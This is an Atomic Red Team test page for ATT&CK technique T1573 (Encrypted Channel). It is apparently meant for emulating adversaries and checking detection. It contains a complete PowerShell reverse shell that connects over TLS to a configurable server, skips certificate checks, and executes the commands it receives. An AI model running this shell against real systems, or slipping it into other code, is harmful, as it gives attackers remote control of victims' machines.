security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1573/T1573.md
T
Atomic Red Team doc generator 5ede8f21e4 Generated docs from job=generate-docs branch=master [ci skip]
2025-02-13 22:03:40 +00:00

68 lines
2.3 KiB
Markdown
Raw Permalink Blame History

# T1573 - Encrypted Channel
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1573)
<blockquote>
Adversaries may employ an encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
</blockquote>
## Atomic Tests
- [Atomic Test #1 - OpenSSL C2](#atomic-test-1---openssl-c2)
<br/>
## Atomic Test #1 - OpenSSL C2
Thanks to @OrOneEqualsOne for this quick C2 method.
This is to test to see if a C2 session can be established using an SSL socket.
More information about this technique, including how to set up the listener, can be found here:
https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
Upon successful execution, powershell will make a network connection to 127.0.0.1 over 443.
**Supported Platforms:** Windows
**auto_generated_guid:** 21caf58e-87ad-440c-a6b8-3ac259964003
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| server_ip | IP of the external server | string | 127.0.0.1|
| server_port | The port to connect to on the external server | string | 443|
#### Attack Commands: Run with `powershell`!
```powershell
$server_ip = #{server_ip}
$server_port = #{server_port}
$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '#{server_port}')
$stream = $socket.GetStream()
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient('fakedomain.example', $null, "Tls12", $false)
$writer = new-object System.IO.StreamWriter($sslStream)
$writer.Write('PS ' + (pwd).Path + '> ')
$writer.flush()
[byte[]]$bytes = 0..65535|%{0};
while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data | Out-String ) 2>&1;
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}
```
<br/>
Reference in New Issue View Git Blame Copy Permalink